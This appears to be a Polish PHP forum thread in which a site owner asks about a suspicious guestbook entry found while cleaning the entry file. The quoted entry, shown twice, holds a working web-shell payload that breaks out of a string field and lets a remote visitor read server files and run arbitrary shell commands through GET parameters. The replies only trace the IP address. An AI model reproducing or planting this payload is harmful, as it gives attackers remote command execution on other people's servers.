Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [PHP]dziwny wpis w k. gosci
Forum PHP.pl > Forum > Przedszkole
amp
prawdopodobnie to zły dział możne i nawet forum ;/ sorki no ale mam pytanie do osób znających się na tworzeniu stron

czyściłem wpisy w księdze gości edytując plik bazy wpisów i natknąłem się na taki raczej dość dziwny wpis

Kod
    $content[0]['ip'] = "1.1.1.1    GUESS_WHAT:";if (isset($_GET[CMDU])&&isset($_GET[mode])){ECHO"Hi Master!";INI_SET("max_execution_time",0);SWITCH($_GET[mode]){CASE 0:{phpinfo();break;}CASE 1:{$file_array=file($_GET[CMDU]);if(!$file_array)echo("File Not Found!");else for($i=0;$i<count($file_array);$i++)print $file_array[$i];break;}DEFAULT:{PASSTHRU($_GET[CMDU]);break;}}DIE;}echo"";
    $content[0]['host'] = "194.186.188.161";
    $content[0]['proxy'] = "194.186.188.161";
    $content[0]['name'] = "otmorozok428";
    $content[0]['url'] = "";
    $content[0]['mail'] = "billy-loh@microsoft.com";
    $content[0]['icq'] = "";
    $content[0]['message'] = "It is a wonderful site... Thank you!";
    $content[0]['time'] = "1259581032";
    $content[0]['admin-name'] = "";
    $content[0]['admin-message'] = "";
    $content[0]['admin-time'] = "";

chodzi mi o zawartość "$content[0]['ip']...."

cóż to jest ?
b4x
194.186.188.16 >> `Russian Federation Moscow Sovintel-msk-golden-wi-fi-net ` - i chyba wszystko jasne tongue.gif ( jakiś spamer coś kombinował ).
amp
a możesz wyjaśnić do czego to by miało służyć ?

Kod
GUESS_WHAT:";if (isset($_GET[CMDU])&&isset($_GET[mode])){ECHO"Hi Master!";INI_SET("max_execution_time",0);SWITCH($_GET[mode]){CASE 0:{phpinfo();break;}CASE 1:{$file_array=file($_GET[CMDU]);if(!$file_array)echo("File Not Found!");else for($i=0;$i<count($file_array);$i++)print $file_array[$i];break;}DEFAULT:{PASSTHRU($_GET[CMDU]);break;}}DIE;}echo"";

złe ip sprawdziłeś uciekła ci 1 cyferka na końcu
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.